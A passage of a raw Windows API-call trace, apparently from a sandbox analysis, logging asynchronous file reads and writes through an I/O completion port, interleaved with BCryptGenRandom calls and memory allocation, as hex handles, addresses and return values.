lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.129] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.163] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.164] CloseHandle (hObject=0x3b8) returned 1 [0086.168] free (_Block=0x1fb18c0) [0086.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.171] CloseHandle (hObject=0x3b8) returned 1 [0086.171] free (_Block=0x1fb18c0) [0086.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.183] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.183] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.183] free (_Block=0x1ff1e60) [0086.183] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.183] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.184] free (_Block=0x1ff1e60) [0086.184] free (_Block=0x1ff1930) [0086.184] free (_Block=0x77d800) [0086.184] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.184] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.371] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x5aaf, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.450] CloseHandle (hObject=0x3b8) returned 1 [0086.450] free (_Block=0x1fb18c0) [0086.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.465] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.465] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.465] free (_Block=0x1ff1e60) [0086.465] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.466] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.468] free (_Block=0x1ff1e60) [0086.468] free (_Block=0x1ff1930) [0086.468] free (_Block=0x77d800) [0086.468] WriteFile (in: hFile=0x3a0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0086.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.472] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0086.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.667] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.679] CloseHandle (hObject=0x3b8) returned 1 [0086.679] free (_Block=0x1fb18c0) [0086.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.698] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.698] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.698] free (_Block=0x1ff1e60) [0086.698] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.698] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.699] free (_Block=0x1ff1e60) [0086.699] free (_Block=0x1ff1930) [0086.699] free (_Block=0x77d800) [0086.699] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0086.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.700] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0086.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.270] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0087.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.282] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.302] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.373] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.408] CloseHandle (hObject=0x3b8) returned 1 [0087.414] free (_Block=0x1fb18c0) [0087.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.444] CloseHandle (hObject=0x3c0) returned 1 [0087.444] free (_Block=0x2031ed0) [0087.448] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.454] CloseHandle (hObject=0x3c4) returned 1 [0087.454] free (_Block=0x3e30078) [0087.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.455] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0087.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.518] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0xb04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.536] ReadFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 0x0 [0087.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.576] CloseHandle (hObject=0x3a0) returned 1 [0087.580] free (_Block=0x3e30078) [0087.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.595] CloseHandle (hObject=0x3c4) returned 1 [0087.596] free (_Block=0x1fb18c0) [0087.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.610] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0087.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.618] ReadFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 0x0 [0087.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.632] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x547b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.634] CloseHandle (hObject=0x3c4) returned 1 [0087.634] free (_Block=0x1fb18c0) [0087.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.733] CloseHandle (hObject=0x3b8) returned 1 [0087.734] free (_Block=0x3d70048) [0087.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.747] CloseHandle (hObject=0x3b8) returned 1 [0087.748] free (_Block=0x1fb18c0) [0087.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0087.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0087.774] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.774] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.774] free (_Block=0x77d800) [0087.774] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.774] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.775] free (_Block=0x1ff1930) [0087.775] free (_Block=0x1ff1a40) [0087.775] free (_Block=0x77d908) [0087.775] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.775] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0087.790] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0087.790] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.790] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.790] free (_Block=0x77d800) [0087.791] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.791] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.791] free (_Block=0x1ff1930) [0087.791] free (_Block=0x1ff1a40) [0087.791] free (_Block=0x77d908) [0087.791] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0087.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0087.899] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.899] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.899] free (_Block=0x77d800) [0087.899] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0087.899] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0087.899] free (_Block=0x3db00b8) [0087.899] free (_Block=0x3db01c8) [0087.899] free (_Block=0x77d908) [0087.899] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0087.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0087.907] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.908] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.908] free (_Block=0x77d800) [0087.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fb18c0 [0087.908] calloc (_Count=0x82, _Size=0x4) returned 0x1fb19d0 [0087.908] free (_Block=0x1fb18c0) [0087.908] free (_Block=0x1fb19d0) [0087.908] free (_Block=0x77d908) [0087.908] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.911] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x17720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.913] CloseHandle (hObject=0x3c4) returned 1 [0087.913] free (_Block=0x1ff1e60) [0087.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, 